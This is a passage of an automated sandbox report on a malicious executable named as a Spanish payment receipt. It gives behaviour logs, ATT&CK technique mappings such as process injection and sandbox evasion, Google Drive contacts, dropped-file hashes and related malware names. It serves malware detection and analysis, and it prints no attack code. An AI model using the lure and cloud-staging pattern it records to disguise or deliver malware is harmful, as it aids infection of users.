Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
comprobante de pago.exe	21%	Virustotal		Browse
comprobante de pago.exe	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe	16%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://go.microsoft.c	0%	Avira URL Cloud	safe
http://go.microsoft.ce	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.110	true	false		high
drive.usercontent.google.com	142.250.185.97	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBDr	powershell.exe, 00000002.00000002.1502481659.0000000004F21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000005.00000002.2076610186.000001D70EAB2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2/C:	svchost.exe, 00000005.00000003.1203217781.000001D70E7B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	comprobante de pago.exe	false		high
https://drive.go	msiexec.exe, 0000000C.00000002.2079704311.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod/C:	edb.log.5.dr	false		high
https://drive.google.com/Y	msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 0000000C.00000003.1987612462.0000000007789000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/G	msiexec.exe, 0000000C.00000002.2079704311.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.microsoft.c	powershell.exe, 00000002.00000002.1501957311.00000000030F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.google.com	msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.microsoft.ce	powershell.exe, 00000002.00000002.1501957311.00000000030F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/(	msiexec.exe, 0000000C.00000003.1987612462.0000000007789000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1502481659.0000000004F21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/v	msiexec.exe, 0000000C.00000002.2079704311.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.185.110	drive.google.com	United States		15169	GOOGLEUS	false
142.250.185.97	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636132
Start date and time:	2025-03-12 12:38:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	comprobante de pago.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/34@2/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 103 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.175.87.197
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6744 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:39:36	API Interceptor	40x Sleep call for process: powershell.exe modified
07:40:12	API Interceptor	2x Sleep call for process: svchost.exe modified
07:41:07	API Interceptor	2x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	yJLckVp9HE.exe	Get hash	malicious	FatalRAT, GhostRat, Nitol	Browse	142.250.185.110 142.250.185.97
	yJLckVp9HE.exe	Get hash	malicious	Unknown	Browse	142.250.185.110 142.250.185.97
	DTSSymmetryDLL.dll.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse	142.250.185.110 142.250.185.97
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.185.110 142.250.185.97
	TEDGRQXB.exe	Get hash	malicious	Vidar	Browse	142.250.185.110 142.250.185.97
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.185.110 142.250.185.97
	scripthook.zip	Get hash	malicious	Unknown	Browse	142.250.185.110 142.250.185.97
	1776871603.exe	Get hash	malicious	Clipboard Hijacker	Browse	142.250.185.110 142.250.185.97
	MG710417.exe	Get hash	malicious	Azorult	Browse	142.250.185.110 142.250.185.97

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.802190593906739
Encrypted:	false
SSDEEP:	1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAq:RJE+Lfki1GjHwU/+vVhWqpL
MD5:	69B847E6BFA96019EE44A05508136C6F
SHA1:	CFD4FA4323F86E56DAE4103413C1014C01FBCB91
SHA-256:	E8FD4725AB4FAC7D571FB66EF5C39A9FAA823D9BE266B0D9F7B4F7FF0851774B
SHA-512:	078A74638F2BD35B4B362836F0DCBBF01628B4B6869B7E4856FDA8060922F7525C87C6DE779962DDBBEFC8DD07A75FDB4B4E1FDAF4B029A8733129F087293040
Malicious:	false
Reputation:	low
Preview:	..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x6845d584, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.9432970197883642
Encrypted:	false
SSDEEP:	1536:LSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:LazaHvxXy2V2UR
MD5:	35ED2B621AFDE5386832A67DFFF35D4F
SHA1:	E0859FC4851E92DB5465C16C811C1F3035CF6CA2
SHA-256:	6C964ADBAAEC7565F9026D535C69972E700AB3D0228C583B1140F02DA4B57CA1
SHA-512:	6263E03A939DB5736E60715FCCF4EA9ADAA6616E88C453B3B982B500158B7544005399EEBB23B3799C27F3A543F664809E3627067708BB50CE6C464CD73E160F
Malicious:	false
Reputation:	low
Preview:	hE.... ...............X\...;...{......................0.x...... ...{s..(...}..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{...................................A.I.(...}..................E.bz.(...}...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08056585759197786
Encrypted:	false
SSDEEP:	3:e3/KYee8INnFSvll/nqlFcl1ZUllll3B4illYllGBnX/l/Tj/k7/t:e3/KzyNnall/qlFclQ/l5B4ile254
MD5:	E65999A2A668206EB156B52066E17693
SHA1:	29A0D91D3E0C62490092B8E263DD164D1FAE03B1
SHA-256:	2CD008AB7CEFC41BC5B73AD3F1B6BB6AB00A19C605BA8F7D403DC1B1478E449C
SHA-512:	7CDDBF2EE71AAE56A533E6B41F8D97CE3821520CA8E6CA651D88A78BAE476C8DCE689BD08BA027179441DF08FF953206102DDFE9A061230586185372E67A0CC7
Malicious:	false
Reputation:	low
Preview:	........................................;...{...(...}... ...{s.......... ...{s.. ...{s.P.... ...{s.................E.bz.(...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqd1gfdv.vhd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e04skr4l.c01.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2ugaecg.yhf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly44lvx2.wd3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Haandevendinger.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	419
Entropy (8bit):	4.346873685364181
Encrypted:	false
SSDEEP:	12:EA8d4jkATOlzPRg11YNf2speXNF0cVtXhhtZsRmKI/6:EJijNOw1gf2J9F/V7Kz
MD5:	61313D818062FBFD3E759F3DAB393769
SHA1:	369870A1B8818BB8F4C4AF5D8FCC9C9133BB2131
